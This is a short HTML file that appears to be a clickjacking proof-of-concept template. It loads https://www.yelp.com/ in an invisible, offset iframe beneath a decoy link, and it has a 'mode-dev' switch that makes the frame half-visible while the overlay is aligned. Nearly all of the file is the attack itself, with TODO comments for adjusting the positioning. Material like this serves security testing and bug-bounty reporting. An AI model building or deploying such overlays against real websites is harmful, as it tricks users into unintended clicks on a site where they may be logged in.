<html id='mode-dev'> <!-- TODO give a 'mode-dev' during the dev of the exploit, then remove it -->
	<body>
		<style>
			#victim {
				opacity: 0;
				position: absolute;
				/* TODO Update it */
				height: 155px;
				width: 1032px;
				top: -88px;
				left: -880px;
			}

			#probe {
				position: absolute;
				/* TODO Update it */
				font-size: 12px;
			}

			#mode-dev #victim {
				opacity: .5;
			}
		</style>
		<!-- the href is here just to make this link clickable -->
		<!-- Update the `<br/>` tag inside the link -->
		<a id=probe href="javascript:void">You are not able<br/>to click me</a>
		<iframe id=victim src="https://www.yelp.com/"></iframe>
	</body>
</html>
